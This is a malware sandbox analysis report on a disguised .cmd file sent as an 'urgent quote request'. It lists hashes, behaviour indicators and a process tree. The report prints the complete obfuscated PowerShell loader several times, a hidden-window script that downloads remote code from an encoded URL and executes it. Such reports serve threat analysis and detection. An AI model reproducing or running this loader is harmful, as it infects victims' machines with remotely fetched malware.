Malware analysis Verzoek om het indienen van een spoedofferte.gz Malicious activity

Add for printing

File name:	Verzoek om het indienen van een spoedofferte.gz
Full analysis:	https://app.any.run/tasks/d1c540c0-1eb5-46c5-85ff-c5c4179800ea
Verdict:	Malicious activity
Analysis date:	June 11, 2025, 13:40:01
OS:	Windows 10 Professional (build: 19044, 64 bit)
Tags:	arch-exec
Indicators:
MIME:	application/gzip
File info:	gzip compressed data, was "Verzoek om het indienen van een spoedofferte.cmd", last modified: Mon Jun 9 07:31:10 2025, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 6162
MD5:	6566C6AB5427DC88BE1F1E82D7753BBE
SHA1:	56797ECF9112B8517258313EEF84FE7A2FEAFCA8
SHA256:	0F181450B0B8FDAC4AF7203733DD29C58729D14042F610F254D6CC254F9C797B
SSDEEP:	96:K/5Lq843vLwxpKugBYe4ovaCKy/BPjRYtbB2/HTw5A0dfwAhZj4sew/M:K/ALUuBv4ovRFYtbqSwUj4semM

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 60 seconds
Heavy Evasion option:: off
Network geolocation:: off
Additional time used:: none
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 11.3636.19041.0
Adobe Acrobat (64-bit) (23.001.20093)
Adobe Flash Player 32 NPAPI (32.0.0.465)
Adobe Flash Player 32 PPAPI (32.0.0.465)
CCleaner (6.20)
FileZilla 3.65.0 (3.65.0)
Google Chrome (133.0.6943.127)
Google Update Helper (1.3.36.51)
Java 8 Update 271 (64-bit) (8.0.2710.9)
Java Auto Updater (2.8.271.9)
Microsoft Edge (133.0.3065.92)
Microsoft Office Professional 2019 - de-de (16.0.16026.20146)
Microsoft Office Professional 2019 - en-us (16.0.16026.20146)
Microsoft Office Professional 2019 - es-es (16.0.16026.20146)
Microsoft Office Professional 2019 - it-it (16.0.16026.20146)
Microsoft Office Professional 2019 - ja-jp (16.0.16026.20146)
Microsoft Office Professional 2019 - ko-kr (16.0.16026.20146)
Microsoft Office Professional 2019 - pt-br (16.0.16026.20146)
Microsoft Office Professional 2019 - tr-tr (16.0.16026.20146)
Microsoft Office Professionnel 2019 - fr-fr (16.0.16026.20146)
Microsoft Office профессиональный 2019 - ru-ru (16.0.16026.20146)
Microsoft OneNote - en-us (16.0.16026.20146)
Microsoft Update Health Tools (3.74.0.0)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532 (14.36.32532)
Mozilla Firefox (x64 en-US) (136.0)
Mozilla Maintenance Service (136.0)
Notepad++ (64-bit x64) (7.9.1)
Office 16 Click-to-Run Extensibility Component (16.0.15726.20202)
Office 16 Click-to-Run Licensing Component (16.0.16026.20146)
Office 16 Click-to-Run Localization Component (16.0.15726.20202)
Office 16 Click-to-Run Localization Component (16.0.15928.20198)
PowerShell 7-x64 (7.3.5.0)
Update for Windows 10 for x64-based Systems (KB4023057) (2.59.0.0)
Update for Windows 10 for x64-based Systems (KB4023057) (2.63.0.0)
Update for Windows 10 for x64-based Systems (KB4480730) (2.55.0.0)
Update for Windows 10 for x64-based Systems (KB5001716) (8.93.0.0)
VLC media player (3.0.11)
WinRAR 5.91 (64-bit) (5.91.0)
Windows PC Health Check (3.6.2204.08001)

Hotfixes

Client LanguagePack Package
DotNetRollup
DotNetRollup 481
FodMetadata Package
Foundation Package
Hello Face Package
InternetExplorer Optional Package
KB5003791
KB5011048
KB5015684
KB5033052
LanguageFeatures Basic en us Package
LanguageFeatures Handwriting en us Package
LanguageFeatures OCR en us Package
LanguageFeatures Speech en us Package
LanguageFeatures TextToSpeech en us Package
MSPaint FoD Package
MediaPlayer Package
Microsoft OneCore ApplicationModel Sync Desktop FOD Package
Microsoft OneCore DirectX Database FOD Package
NetFx3 OnDemand Package
Notepad FoD Package
OpenSSH Client Package
PowerShell ISE FOD Package
Printing PMCPPC FoD Package
Printing WFS FoD Package
ProfessionalEdition
QuickAssist Package
RollupFix
ServicingStack
ServicingStack 3989
StepsRecorder Package
TabletPCMath Package
UserExperience Desktop Package
WordPad FoD Package

Add for printing

MALICIOUS
- Generic archive extractor
  - WinRAR.exe (PID: 4412)
- Run PowerShell with an invisible window
  - powershell.exe (PID: 2320)
  - powershell.exe (PID: 728)
  - powershell.exe (PID: 3672)
- Script downloads file (POWERSHELL)
  - powershell.exe (PID: 2320)
- Executes malicious content triggered by hijacked COM objects (POWERSHELL)
  - powershell.exe (PID: 2320)
SUSPICIOUS
- The process checks if it is being run in the virtual environment
  - powershell.exe (PID: 2320)
  - powershell.exe (PID: 6656)
  - powershell.exe (PID: 3672)
- Uses base64 encoding (POWERSHELL)
  - powershell.exe (PID: 2320)
  - powershell.exe (PID: 6656)
- Gets or sets the security protocol (POWERSHELL)
  - powershell.exe (PID: 2320)
  - powershell.exe (PID: 6656)
- Uses sleep to delay execution (POWERSHELL)
  - powershell.exe (PID: 2320)
- Retrieves command line args for running process (POWERSHELL)
  - powershell.exe (PID: 2320)
  - powershell.exe (PID: 6656)
- Creates an instance of the specified .NET type (POWERSHELL)
  - powershell.exe (PID: 2320)
- Starts POWERSHELL.EXE for commands execution
  - cmd.exe (PID: 5140)
  - cmd.exe (PID: 6536)
  - cmd.exe (PID: 6404)
- Converts a specified value to a byte (POWERSHELL)
  - powershell.exe (PID: 6656)
INFO
- Creates or changes the value of an item property via Powershell
  - cmd.exe (PID: 5140)
  - cmd.exe (PID: 6536)
  - cmd.exe (PID: 6404)
- Manual execution by a user
  - notepad++.exe (PID: 1896)
  - powershell.exe (PID: 6656)
  - cmd.exe (PID: 6404)
  - cmd.exe (PID: 6536)
  - powershell.exe (PID: 3752)
  - powershell.exe (PID: 6380)
  - cmd.exe (PID: 5140)
- Uses string split method (POWERSHELL)
  - powershell.exe (PID: 2320)
  - powershell.exe (PID: 6656)
- Disables trace logs
  - powershell.exe (PID: 2320)
- Checks proxy server information
  - powershell.exe (PID: 2320)
- Converts byte array into ASCII string (POWERSHELL)
  - powershell.exe (PID: 2320)
  - powershell.exe (PID: 6656)
- Gets data length (POWERSHELL)
  - powershell.exe (PID: 6656)
- Script raised an exception (POWERSHELL)
  - powershell.exe (PID: 6656)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

TRiD

.z/gz/gzip	\|	GZipped data (100)

EXIF

ZIP

Compression:	Deflated
Flags:	FileName
ModifyDate:	2025:06:09 07:31:10+00:00
ExtraFlags:	(none)
OperatingSystem:	FAT filesystem (MS-DOS, OS/2, NT/Win32)
ArchivedFileName:	Verzoek om het indienen van een spoedofferte.cmd

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

158

Monitored processes

20

Malicious processes

3

Suspicious processes

0

Behavior graph

Click at the process to see the details

Process information

PID

CMD

Path

Indicators

Parent process

728

powershell.exe -windowstyle hidden "Get-counter;Get-Service;$Transcondyloid='B'+ [char]58;Get-hotfix;$krften=(gcm $Transcondyloid).CommandType;$krften=[String]$krften;New-Alias -Name Efterretning -Value ni;$krften+=':';(Efterretning -p $krften -n Baptisia -value { param ($Windowsill);$Nonfunded=4;do {$Honnrmarchen+=$Windowsill[$Nonfunded];$Nonfunded+=5} until(!$Windowsill[$Nonfunded])$Honnrmarchen});(Efterretning -p $krften -n Pylangial -value {param ($Vocabular);.($Bredbaandssatellittens) ($Vocabular)});ConvertTo-Html;$Anecdotally=Baptisia 'FunknUndeER cuTPreb. Sstw';$Anecdotally+=Baptisia 'NadnEOpvabPrinCAfsplhoveiEuraE RannC ffT';$Unemotionalism=Baptisia 'Jn nMEpanoKystz naviLokil BohlOm iaSoli/';$Emblazons=Baptisia ' MilTHejslSatssAads1Un e2';$Lido='flsk[Morbn ComeGoomtAmp .BegySAdhsENigorVolcVStati NonCReciE A,opLageO ascITr an ortpr,dmS,riaAnfonG.nsA WatG,bsteHundrIn.f] Pr.:Euct: troS SsteKataCmarkuFo dRKorrIBarftE esyvuggpStanRSpidoUdehtReoroAspaCA,omoKvinLOver=Dizd$Lavie TegM RepBParalM.ljAFibrz omaO .awN ydiS';$Unemotionalism+=Baptisia '.pli5 Til.Nepe0Erhv Unpa(KollW L niJackn LysdLeptoEvenwForbsPre Ras.NFrugTReat Elpr1Badg0Mili.Ufoe0 g.n;Beef fi,iWRubei oennLyse6Komm4Over;Bar. MoguxThur6Etap4Ire ; Per S darA.kevSpar:E,te1Galg3Rent9Symm. Ge 0abla) For sk dGMulteSpircChonkFurmoFlyd/Beat2Spni0Idrt1 fka0Nona0 Cl 1Unap0Galp1bear LedF ForipontrTicieM ldfD,mio AflxSlum/Agl 1Kolo3Mine9An r. Pho0';$Kommuneplanernes=Baptisia 'Realu BaasReakE FdeRPic,-WindAVe ggFli EHeilnOprit';$Opsimath=Baptisia 'Desch GuatSpndtKnutp EkssEleu:Amph/afkn/fo,tsUroph Sc.iPh sn sceoSaliburesi ClasVandiRetss CyctIncre Ebum Halayams.Dis rmusoo Phy/ AppD eodyImpobPilsl prie M ln Cubs Ono.Tr cxEftetMarip';$Gennembrydes33=Baptisia 'Dybs>';$Bredbaandssatellittens=Baptisia 'UncriUdspEbullx';$nivosity='phenazins';$Hansa='\Ostraciidae.Lyd';Pylangial (Baptisia 'Egos$Semig PapL patOSatsbJannA Tndl ef:GenkH mpVS fiiMe adDdtahFradO Fe VTolvEUltrD fgrEBrnet dsn= co $MomsefiloNUnchvSkyg:n rvadeclpEgnsPIndsDAsseaSmelTQua A er+Bung$ UnihFlugA G,eNFljts eliA');Pylangial (Baptisia ' Pro$,ayagKu lLMateo BorbSu mAReopLIjon:Torpo idevSandELakfrUnkePK,peo ashTEk.pe U,dNchortUdsvL EdiYC lc=Quar$ Bs O ygepAp,rsModeISulfM.iviARedoTEnamhUnst. NapsTidspA lgL.ubcIGue TT ra(Br m$StragSupeE .oon AmmnCactENonsMEje bCy.lr F uYUbesdCyprEBru,sOut 3 Kon3 So )');Pylangial (Baptisia $Lido);$Opsimath=$Overpotently[0];$Precolorable=(Baptisia 'ball$SygegLeuclHjerOBurrBCounAEvolLMini:St,elSm aE OptJ ekoEKonts H dOSn,rlSklmdAk.iAsalatLdig= SubNchikeCompWPero-P,tsoFil BUnmajRusfEDiv,CAt otModf EgenSBeshy Duns Bi tportE enMScen.Aleb$HenrALidtN Face SpeCDoluDAfp oKol tMej.A ReiLVit LArriY');Pylangial ($Precolorable);Pylangial (Baptisia ',pfi$Axu,LIslneCapijRumseTumls Muno ilsl reldStata EnttS,ik.TranH Stie Eida Udsd Vale LabrCemesdy l[,eks$BedvKSpiooHoldmtitamFuglu Hj.nHjl eDolop Irrl la.a LolnSkileFlelrBesynHas.e nmosO at]Biss=Unex$SubaU FaenR teeKvadm UnmoAsyltPresi oexosoranSekoaK mplK,triSulfsPebem');$Nonfundedndorsing=Baptisia 'antiD owdoAli w Stan aralTempo aagaKe ndIagtF,niniHalflB.nde';$Eksempells=Baptisia '.utl$PrefL vbleNonajGigmeSchwsBo foBolil Tj.dRe.iaOldctSpil.metr$Ter NFlgeoH innDhabfVoldu VarnGeodd Fo.eBisud AtonGr,ydGaveo E urU.susAvisiiltfnPiz gD,sp. DeiIflagn Sy v Sa oMed kSuffeR,en( B r$ YarOEngepSkovsAveriRabbmChafaHovnt inthbrun, tio$ DozM OmfiMu,ekPha aBrasdMicroKvajiDyndsA bem khi)';$Mikadoism=$Hvidhovedet;Pylangial (Baptisia ',ell$UdelGBefal Cr o agnB SanATuvaLP ss:S.misu koK,ribRForlmSoftBG,lerA,theLakfDTra,DTaa e xemrIndss lam= Exp( reyTAzopEBracsst vTHin -suliP,nsiAcre TMod,HU of Push$BedrMManuiIsogkSjosABaandLolloLed IElhesDefemgalv)');while (!$Skrmbredders) {Pylangial (Baptisia ' old$StvegBefolPa ao.rflbJensaRverl Eks:BldeNBoasiCullc nalkSti e nstrShe eRaisdje b=Crin$TokaS rtuKuttp KbeeOmvarincldTer eU dev ibbi.rodlEcheiMa,os undh') ;Pylangial $Eksempells;Pylangial (Baptisia 'Ak.v[Ga otAlleHUneprBeskeDissa AntDK ffiAngiNSub GEcro.MagiT atohMaxiRForse pleAJu adGorm]Smol:Decu:FrotST roLE ydEP odeStenpnone( sup4Prec0M.mn0kryd0 bal)');Pylangial (Baptisia 'Nonp$E,etGHydrl.btuo,iohbOptaa eksL par:ForsSBob.kFinaR,redMSur.Bjos RFalleUnred Misd SidEB,nsrDuu SSili=anim(De ttCo tECrosSPyr.T lo-Cerap WhoAMatrTEvneHIllu Hjer$forbM BraIdisekNoneaTilgdAracOB awIDratsPlasM Pla)') ;Pylangial (Baptisia ' ind$ Le GsabeLErigoSacrBPleuaTravLn.ve:Acc.DKontIBov HGedeYLevaD KarrMotooIntecSvejHPhreL.espODiabRileni ,mid UnpESi k=Mudp$ Cr Gst,oL ToroFynbb Fi A H gLSacc:T leSRettOF,stlProdE Eboa un + .pe+U.de%Fro $ fl oirr vblake ,isR K ap IsoOFrokt MenE cern alvt synlWellY Hor.UnricU deO InduE tenNasaT') ;$Opsimath=$Overpotently[$dihydrochloride]}$Nonfundedsa156=416029;$Selvforsynende=30313;Pylangial (Baptisia 'Bagh$ Af,gMcgelVeilOreglBkapla .alLFr,t:An ntPhyliGalvlCi cPKrn lPesaI ettgNitrTi.juE PyrT Bar hyme= Kun KubiGc ntEAromTAnge-p occMuzzo.isoNPhretS ipe.nvoNS ritKrmm Unb$,ontM livITakskUkamAFised U co veriBoisSCl pM');Pylangial (Baptisia ' Til$R tug islDo oo T bb araaecc.lPros:PhalKSt.mrM dluHygimUnrumUdtaeUdetnHjaddJenoeM,ngsUnfa7Stru5Tens vind= .la ar[AssaSNonbyB sksSemitVandePhremSven.com.CDescoObsen Fatvin.de Ti rImdet Hel] fsk:Glut: DmrFCancrSm,koSko mA giBHo,earundsPre.eFors6 Lum4 PerSudgrtTogpr .ili Kn nIssugCur (Sk p$WhauTProvi aslScanpSmislRegii L.vg Runt St.eFuldtUpup)');Pylangial (Baptisia ' lti$ UdbG AstLU exoSt.lB St aWamplP.nt:.ompfAf rrStyruaftogPurpt EnvaOrthvSag LResuEO erR AwaExe,onArthsSnyd rdi= re Ryst[JackSBanky SarSRatcT ejsE QuaMcur .CommTBroneHemaXFratt.urb. Lrke F,nN CelCDechoIncidSpi iCha.nC reGUpbr] ela: Whi: aunAMi oSSvedCoutbIBesmi Spo. No g JoyEGau TProssDanntEfter agtIS ecN ThoGFilm(Negr$P.rakCrowRE.iguJo.dMHospMPlode MonnUdklDButie oksUnif7Gang5Esti)');Pylangial (Baptisia 'A.mi$Fu,lGP,grL De oke nBTickaIngrL Dig: admsImp eFirmBF rou IndnPreadOveryAfsy=Naur$.amefBrndRBoy UIndeGBaynTGenoA leuvB,falAfvreOrk RGratEsamtnSynssAngr.Hazes Di UUpseBFernSRevst esrIn miLivsN A mg.obb(Zinc$HaanNChilOStrinNudiF,tenu usN StoDmetheSisydMultSZimbaNeem1Guld5Peac6Fl t,Ato $ forS CereBu.dLEk.pVO beFLic O To RElekSKik YFl,pnRidnePre,N casDSub.e O d)');Pylangial $Sebundy;"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

—

cmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Windows PowerShell

Exit code:

0

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll

1896

"C:\Program Files\Notepad++\notepad++.exe" "C:\Users\admin\Desktop\Verzoek om het indienen van een spoedofferte.cmd"

C:\Program Files\Notepad++\notepad++.exe

explorer.exe

User:

admin

Company:

Don HO don.h@free.fr

Integrity Level:

MEDIUM

Description:

Notepad++ : a free (GNU) source code editor

Exit code:

0

Version:

7.91

Modules

Images
c:\program files\notepad++\notepad++.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.3636_none_60b6a03d71f818d5\comctl32.dll

2220

\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

—

powershell.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Console Window Host

Exit code:

0

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

2320

powershell.exe -windowstyle hidden "Get-counter;Get-Service;$Transcondyloid='B'+ [char]58;Get-hotfix;$krften=(gcm $Transcondyloid).CommandType;$krften=[String]$krften;New-Alias -Name Efterretning -Value ni;$krften+=':';(Efterretning -p $krften -n Baptisia -value { param ($Windowsill);$Nonfunded=4;do {$Honnrmarchen+=$Windowsill[$Nonfunded];$Nonfunded+=5} until(!$Windowsill[$Nonfunded])$Honnrmarchen});(Efterretning -p $krften -n Pylangial -value {param ($Vocabular);.($Bredbaandssatellittens) ($Vocabular)});ConvertTo-Html;$Anecdotally=Baptisia 'FunknUndeER cuTPreb. Sstw';$Anecdotally+=Baptisia 'NadnEOpvabPrinCAfsplhoveiEuraE RannC ffT';$Unemotionalism=Baptisia 'Jn nMEpanoKystz naviLokil BohlOm iaSoli/';$Emblazons=Baptisia ' MilTHejslSatssAads1Un e2';$Lido='flsk[Morbn ComeGoomtAmp .BegySAdhsENigorVolcVStati NonCReciE A,opLageO ascITr an ortpr,dmS,riaAnfonG.nsA WatG,bsteHundrIn.f] Pr.:Euct: troS SsteKataCmarkuFo dRKorrIBarftE esyvuggpStanRSpidoUdehtReoroAspaCA,omoKvinLOver=Dizd$Lavie TegM RepBParalM.ljAFibrz omaO .awN ydiS';$Unemotionalism+=Baptisia '.pli5 Til.Nepe0Erhv Unpa(KollW L niJackn LysdLeptoEvenwForbsPre Ras.NFrugTReat Elpr1Badg0Mili.Ufoe0 g.n;Beef fi,iWRubei oennLyse6Komm4Over;Bar. MoguxThur6Etap4Ire ; Per S darA.kevSpar:E,te1Galg3Rent9Symm. Ge 0abla) For sk dGMulteSpircChonkFurmoFlyd/Beat2Spni0Idrt1 fka0Nona0 Cl 1Unap0Galp1bear LedF ForipontrTicieM ldfD,mio AflxSlum/Agl 1Kolo3Mine9An r. Pho0';$Kommuneplanernes=Baptisia 'Realu BaasReakE FdeRPic,-WindAVe ggFli EHeilnOprit';$Opsimath=Baptisia 'Desch GuatSpndtKnutp EkssEleu:Amph/afkn/fo,tsUroph Sc.iPh sn sceoSaliburesi ClasVandiRetss CyctIncre Ebum Halayams.Dis rmusoo Phy/ AppD eodyImpobPilsl prie M ln Cubs Ono.Tr cxEftetMarip';$Gennembrydes33=Baptisia 'Dybs>';$Bredbaandssatellittens=Baptisia 'UncriUdspEbullx';$nivosity='phenazins';$Hansa='\Ostraciidae.Lyd';Pylangial (Baptisia 'Egos$Semig PapL patOSatsbJannA Tndl ef:GenkH mpVS fiiMe adDdtahFradO Fe VTolvEUltrD fgrEBrnet dsn= co $MomsefiloNUnchvSkyg:n rvadeclpEgnsPIndsDAsseaSmelTQua A er+Bung$ UnihFlugA G,eNFljts eliA');Pylangial (Baptisia ' Pro$,ayagKu lLMateo BorbSu mAReopLIjon:Torpo idevSandELakfrUnkePK,peo ashTEk.pe U,dNchortUdsvL EdiYC lc=Quar$ Bs O ygepAp,rsModeISulfM.iviARedoTEnamhUnst. NapsTidspA lgL.ubcIGue TT ra(Br m$StragSupeE .oon AmmnCactENonsMEje bCy.lr F uYUbesdCyprEBru,sOut 3 Kon3 So )');Pylangial (Baptisia $Lido);$Opsimath=$Overpotently[0];$Precolorable=(Baptisia 'ball$SygegLeuclHjerOBurrBCounAEvolLMini:St,elSm aE OptJ ekoEKonts H dOSn,rlSklmdAk.iAsalatLdig= SubNchikeCompWPero-P,tsoFil BUnmajRusfEDiv,CAt otModf EgenSBeshy Duns Bi tportE enMScen.Aleb$HenrALidtN Face SpeCDoluDAfp oKol tMej.A ReiLVit LArriY');Pylangial ($Precolorable);Pylangial (Baptisia ',pfi$Axu,LIslneCapijRumseTumls Muno ilsl reldStata EnttS,ik.TranH Stie Eida Udsd Vale LabrCemesdy l[,eks$BedvKSpiooHoldmtitamFuglu Hj.nHjl eDolop Irrl la.a LolnSkileFlelrBesynHas.e nmosO at]Biss=Unex$SubaU FaenR teeKvadm UnmoAsyltPresi oexosoranSekoaK mplK,triSulfsPebem');$Nonfundedndorsing=Baptisia 'antiD owdoAli w Stan aralTempo aagaKe ndIagtF,niniHalflB.nde';$Eksempells=Baptisia '.utl$PrefL vbleNonajGigmeSchwsBo foBolil Tj.dRe.iaOldctSpil.metr$Ter NFlgeoH innDhabfVoldu VarnGeodd Fo.eBisud AtonGr,ydGaveo E urU.susAvisiiltfnPiz gD,sp. DeiIflagn Sy v Sa oMed kSuffeR,en( B r$ YarOEngepSkovsAveriRabbmChafaHovnt inthbrun, tio$ DozM OmfiMu,ekPha aBrasdMicroKvajiDyndsA bem khi)';$Mikadoism=$Hvidhovedet;Pylangial (Baptisia ',ell$UdelGBefal Cr o agnB SanATuvaLP ss:S.misu koK,ribRForlmSoftBG,lerA,theLakfDTra,DTaa e xemrIndss lam= Exp( reyTAzopEBracsst vTHin -suliP,nsiAcre TMod,HU of Push$BedrMManuiIsogkSjosABaandLolloLed IElhesDefemgalv)');while (!$Skrmbredders) {Pylangial (Baptisia ' old$StvegBefolPa ao.rflbJensaRverl Eks:BldeNBoasiCullc nalkSti e nstrShe eRaisdje b=Crin$TokaS rtuKuttp KbeeOmvarincldTer eU dev ibbi.rodlEcheiMa,os undh') ;Pylangial $Eksempells;Pylangial (Baptisia 'Ak.v[Ga otAlleHUneprBeskeDissa AntDK ffiAngiNSub GEcro.MagiT atohMaxiRForse pleAJu adGorm]Smol:Decu:FrotST roLE ydEP odeStenpnone( sup4Prec0M.mn0kryd0 bal)');Pylangial (Baptisia 'Nonp$E,etGHydrl.btuo,iohbOptaa eksL par:ForsSBob.kFinaR,redMSur.Bjos RFalleUnred Misd SidEB,nsrDuu SSili=anim(De ttCo tECrosSPyr.T lo-Cerap WhoAMatrTEvneHIllu Hjer$forbM BraIdisekNoneaTilgdAracOB awIDratsPlasM Pla)') ;Pylangial (Baptisia ' ind$ Le GsabeLErigoSacrBPleuaTravLn.ve:Acc.DKontIBov HGedeYLevaD KarrMotooIntecSvejHPhreL.espODiabRileni ,mid UnpESi k=Mudp$ Cr Gst,oL ToroFynbb Fi A H gLSacc:T leSRettOF,stlProdE Eboa un + .pe+U.de%Fro $ fl oirr vblake ,isR K ap IsoOFrokt MenE cern alvt synlWellY Hor.UnricU deO InduE tenNasaT') ;$Opsimath=$Overpotently[$dihydrochloride]}$Nonfundedsa156=416029;$Selvforsynende=30313;Pylangial (Baptisia 'Bagh$ Af,gMcgelVeilOreglBkapla .alLFr,t:An ntPhyliGalvlCi cPKrn lPesaI ettgNitrTi.juE PyrT Bar hyme= Kun KubiGc ntEAromTAnge-p occMuzzo.isoNPhretS ipe.nvoNS ritKrmm Unb$,ontM livITakskUkamAFised U co veriBoisSCl pM');Pylangial (Baptisia ' Til$R tug islDo oo T bb araaecc.lPros:PhalKSt.mrM dluHygimUnrumUdtaeUdetnHjaddJenoeM,ngsUnfa7Stru5Tens vind= .la ar[AssaSNonbyB sksSemitVandePhremSven.com.CDescoObsen Fatvin.de Ti rImdet Hel] fsk:Glut: DmrFCancrSm,koSko mA giBHo,earundsPre.eFors6 Lum4 PerSudgrtTogpr .ili Kn nIssugCur (Sk p$WhauTProvi aslScanpSmislRegii L.vg Runt St.eFuldtUpup)');Pylangial (Baptisia ' lti$ UdbG AstLU exoSt.lB St aWamplP.nt:.ompfAf rrStyruaftogPurpt EnvaOrthvSag LResuEO erR AwaExe,onArthsSnyd rdi= re Ryst[JackSBanky SarSRatcT ejsE QuaMcur .CommTBroneHemaXFratt.urb. Lrke F,nN CelCDechoIncidSpi iCha.nC reGUpbr] ela: Whi: aunAMi oSSvedCoutbIBesmi Spo. No g JoyEGau TProssDanntEfter agtIS ecN ThoGFilm(Negr$P.rakCrowRE.iguJo.dMHospMPlode MonnUdklDButie oksUnif7Gang5Esti)');Pylangial (Baptisia 'A.mi$Fu,lGP,grL De oke nBTickaIngrL Dig: admsImp eFirmBF rou IndnPreadOveryAfsy=Naur$.amefBrndRBoy UIndeGBaynTGenoA leuvB,falAfvreOrk RGratEsamtnSynssAngr.Hazes Di UUpseBFernSRevst esrIn miLivsN A mg.obb(Zinc$HaanNChilOStrinNudiF,tenu usN StoDmetheSisydMultSZimbaNeem1Guld5Peac6Fl t,Ato $ forS CereBu.dLEk.pVO beFLic O To RElekSKik YFl,pnRidnePre,N casDSub.e O d)');Pylangial $Sebundy;"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

cmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows PowerShell

Exit code:

0

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

2468

\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

—

cmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Console Window Host

Exit code:

0

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

2952

"C:\WINDOWS\SysWOW64\msiexec.exe"

C:\Windows\SysWOW64\msiexec.exe

—

powershell.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows® installer

Version:

5.0.19041.3636 (WinBuild.160101.0800)

Modules

Images
c:\windows\syswow64\mshtml.dll
c:\windows\syswow64\msiexec.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll

3672

powershell.exe -windowstyle hidden "Get-counter;Get-Service;$Transcondyloid='B'+ [char]58;Get-hotfix;$krften=(gcm $Transcondyloid).CommandType;$krften=[String]$krften;New-Alias -Name Efterretning -Value ni;$krften+=':';(Efterretning -p $krften -n Baptisia -value { param ($Windowsill);$Nonfunded=4;do {$Honnrmarchen+=$Windowsill[$Nonfunded];$Nonfunded+=5} until(!$Windowsill[$Nonfunded])$Honnrmarchen});(Efterretning -p $krften -n Pylangial -value {param ($Vocabular);.($Bredbaandssatellittens) ($Vocabular)});ConvertTo-Html;$Anecdotally=Baptisia 'FunknUndeER cuTPreb. Sstw';$Anecdotally+=Baptisia 'NadnEOpvabPrinCAfsplhoveiEuraE RannC ffT';$Unemotionalism=Baptisia 'Jn nMEpanoKystz naviLokil BohlOm iaSoli/';$Emblazons=Baptisia ' MilTHejslSatssAads1Un e2';$Lido='flsk[Morbn ComeGoomtAmp .BegySAdhsENigorVolcVStati NonCReciE A,opLageO ascITr an ortpr,dmS,riaAnfonG.nsA WatG,bsteHundrIn.f] Pr.:Euct: troS SsteKataCmarkuFo dRKorrIBarftE esyvuggpStanRSpidoUdehtReoroAspaCA,omoKvinLOver=Dizd$Lavie TegM RepBParalM.ljAFibrz omaO .awN ydiS';$Unemotionalism+=Baptisia '.pli5 Til.Nepe0Erhv Unpa(KollW L niJackn LysdLeptoEvenwForbsPre Ras.NFrugTReat Elpr1Badg0Mili.Ufoe0 